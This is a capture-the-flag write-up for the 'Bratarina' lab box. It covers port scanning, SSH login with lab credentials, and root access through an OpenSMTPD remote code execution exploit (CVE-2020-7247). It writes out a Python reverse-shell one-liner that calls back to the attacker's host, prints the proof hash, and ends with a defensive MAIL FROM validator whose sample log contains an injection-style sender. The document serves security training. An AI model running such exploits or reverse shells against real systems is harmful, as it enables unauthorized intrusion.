Summary #
Using the provided OFFSEC credentials, initial access is possible through SSH. Another path is exploiting the OpenSMTPD service running on port 25, which is vulnerable to a remote code execution exploit that gives access to the root user.
Specifications #
- Name: BRATARINA
- Platform: PG PRACTICE
- Points: 10
- Difficulty: Easy
- OS: Linux bratarina 4.15.0-109-generic #110-Ubuntu SMP Tue Jun 23 02:39:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
- IP address: 192.168.159.71
- OFFSEC provided credentials: neil:TalonTribunalFrown090
- HASH local.txt: None
- HASH proof.txt: d1a3e21c27ac4c1a7a7ebbd6ced4f708
Preparation #
First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:
## create directory structure
mkdir bratarina && cd bratarina && mkdir enum files exploits uploads tools
## list directory
ls -la
total 28
drwxrwxr-x 7 kali kali 4096 Jul 21 15:50 .
drwxrwxr-x 12 kali kali 4096 Jul 21 15:50 ..
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 enum
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 exploits
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 files
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 tools
drwxrwxr-x 2 kali kali 4096 Jul 21 15:50 uploads
## set bash variable
ip=192.168.159.71
## ping target to check if it's online
ping $ip
PING 192.168.159.71 (192.168.159.71) 56(84) bytes of data.
64 bytes from 192.168.159.71: icmp_seq=1 ttl=61 time=23.9 ms
64 bytes from 192.168.159.71: icmp_seq=2 ttl=61 time=25.5 ms
^C
--- 192.168.159.71 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 23.894/24.681/25.469/0.787 ms
Reconnaissance #
Portscanning #
Using Rustscan we can see which TCP ports are open. This tool is part of my default portscan flow.
## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.159.71:22
Open 192.168.159.71:25
Open 192.168.159.71:80
Open 192.168.159.71:445
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 15:54 CEST
Initiating Ping Scan at 15:54
Scanning 192.168.159.71 [4 ports]
Completed Ping Scan at 15:54, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:54
Completed Parallel DNS resolution of 1 host. at 15:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:54
Scanning 192.168.159.71 [4 ports]
Discovered open port 445/tcp on 192.168.159.71
Discovered open port 25/tcp on 192.168.159.71
Discovered open port 22/tcp on 192.168.159.71
Discovered open port 80/tcp on 192.168.159.71
Completed SYN Stealth Scan at 15:54, 0.04s elapsed (4 total ports)
Nmap scan report for 192.168.159.71
Host is up, received echo-reply ttl 61 (0.021s latency).
Scanned at 2025-07-21 15:54:41 CEST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
25/tcp open smtp syn-ack ttl 61
80/tcp open http syn-ack ttl 61
445/tcp open microsoft-ds syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 8 (328B) | Rcvd: 5 (204B)
Copy the output of open ports into a file called ports within the files directory.
## edit the `files/ports` file
nano files/ports
## content `ports` file:
22/tcp open ssh syn-ack ttl 61
25/tcp open smtp syn-ack ttl 61
80/tcp open http syn-ack ttl 61
445/tcp open microsoft-ds syn-ack ttl 61
Run the following command to get a comma-separated string of all open ports, and use its output in the nmap command:
## change directory
cd files
## get a list, comma separated of the open port(s)
cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports
## output previous command
22,25,80,445
## move one up
cd ..
## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,25,80,445 -sCV -vv $ip -oN enum/nmap-services-tcp
Output of NMAP:
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
|_http-server-header: nginx/1.14.0 (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: bratarina
| NetBIOS computer name: BRATARINA\x00
| Domain name: \x00
| FQDN: bratarina
|_ System time: 2025-07-21T09:56:16-04:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h20m01s, deviation: 2h18m36s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 17784/tcp): CLEAN (Timeout)
| Check 2 (port 15623/tcp): CLEAN (Timeout)
| Check 3 (port 33461/udp): CLEAN (Timeout)
| Check 4 (port 34791/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-07-21T13:56:13
|_ start_date: N/A
Initial Access #
Initial Access: path 1 #
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
Because OFFSEC provided us with credentials, we first try to log in over SSH on TCP port 22.
## login to target using SSH and provided credentials
ssh neil@$ip
neil@bratarina:~$
Indeed, we can log in over SSH for initial access.
Initial Access: path 2 #
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello nmap.scanme.org [192.168.45.195], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES,
On port 25 an OpenSMTPD service is running. Using searchsploit we can try to find an available exploit. We can try to get remote code execution using linux/remote/47984.py.
## change directory
cd exploits
## use searchsploit to find exploit
searchsploit opensmtpd
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
searchsploit -m linux/remote/47984.py
Exploit: OpenSMTPD 6.6.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47984
Path: /usr/share/exploitdb/exploits/linux/remote/47984.py
Codes: CVE-2020-7247
Verified: True
File Type: Python script, ASCII text executable
Once mirrored, we can run the exploit and get root on the box. The command it executes on the target is a Python reverse shell, so we first need to set up a listener.
## setup listener
nc -lvnp 80
## run the exploit
python3 47984.py 192.168.159.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.45.195\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
## catch reverse shell
nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.159.71] 44560
## run the `whoami` command
root@bratarina:~# whoami
root
## print `proof.txt`
root@bratarina:~# cat /root/proof.txt
cat /root/proof.txt
d1a3e21c27ac4c1a7a7ebbd6ced4f708
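The exploit used above (CVE-2020-7247, listed by searchsploit as "MAIL FROM Remote Code Execution") delivers its command through the SMTP envelope sender, and the HELP text nmap captured carries no version string, so a banner check cannot tell a patched daemon from a vulnerable one. The script below is an added example for the defender's side and is not part of the original writeup or of the exploit-db module: it applies strict RFC 5321 dot-atom validation to every MAIL FROM in an SMTP transcript and reports each sender a hardened MTA (or a mail-flow sensor) should have rejected. The transcript, hostnames and addresses are constructed for the example, not captured from the box.

```python
import re
from typing import List, NamedTuple

# RFC 5321 "atext": the only characters allowed in an unquoted (dot-atom) local-part.
ATEXT = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
            "!#$%&'*+-/=?^_`{|}~")

MAIL_FROM_RE = re.compile(r"^MAIL FROM:\s*<(.*)>", re.IGNORECASE)

# Constructed SMTP transcript (client and server lines interleaved) standing in
# for an MTA debug log or a network-sensor reconstruction. Not real traffic.
SAMPLE_SESSION = """\
220 bratarina ESMTP OpenSMTPD
HELO mailer.example.test
250 bratarina Hello mailer.example.test [10.0.0.5], pleased to meet you
MAIL FROM:<alice@example.test>
250 2.0.0 Ok
RCPT TO:<neil@bratarina>
250 2.1.5 Destination address valid: Recipient ok
MAIL FROM:<>
250 2.0.0 Ok
MAIL FROM:<"first last"@example.test>
250 2.0.0 Ok
MAIL FROM:<user;$(x) y@>
250 2.0.0 Ok
MAIL FROM:<nodomain>
250 2.0.0 Ok
"""


class Finding(NamedTuple):
    line_no: int
    address: str
    reason: str


def check_sender(address: str) -> str:
    """Return '' if the envelope sender is a well-formed dot-atom mailbox or the
    null reverse-path, otherwise a short reason why strict validation rejects it."""
    if address == "":
        return ""  # <> is the legitimate null reverse-path used for bounces
    if "@" not in address:
        return "no domain part"
    local, domain = address.rsplit("@", 1)
    if len(local) >= 2 and local.startswith('"') and local.endswith('"'):
        # Quoted local-parts are RFC-legal but rare enough to deserve a look.
        return "quoted local-part (RFC-legal but rare; review manually)"
    bad = sorted({c for c in local if c not in ATEXT and c != "."})
    if bad:
        # Anything outside atext is neither a valid mailbox nor something an
        # MTA should ever hand to a shell; this is the check that fails open
        # in the vulnerable OpenSMTPD versions.
        return "illegal characters in local-part: " + repr("".join(bad))
    if not local or not domain:
        return "empty local-part or domain"
    if local.startswith(".") or local.endswith(".") or ".." in local:
        return "malformed dot-atom local-part"
    return ""


def scan_session(transcript: str) -> List[Finding]:
    """Scan the client lines of an SMTP transcript and return one Finding per
    MAIL FROM whose sender would not survive strict RFC 5321 validation."""
    findings = []
    for n, line in enumerate(transcript.splitlines(), 1):
        m = MAIL_FROM_RE.match(line.strip())
        if not m:
            continue
        reason = check_sender(m.group(1))
        if reason:
            findings.append(Finding(n, m.group(1), reason))
    return findings


if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: {f.address!r} -> {f.reason}")
```

Run against the sample it reports three senders: the quoted one for manual review, the one with characters outside atext, and the one without a domain. In practice the same function would be fed MAIL FROM lines from the MTA's own logs or from a capture of port 25, and the second category is the one that warrants an alert, since a correctly validating server never accepts such a sender at all.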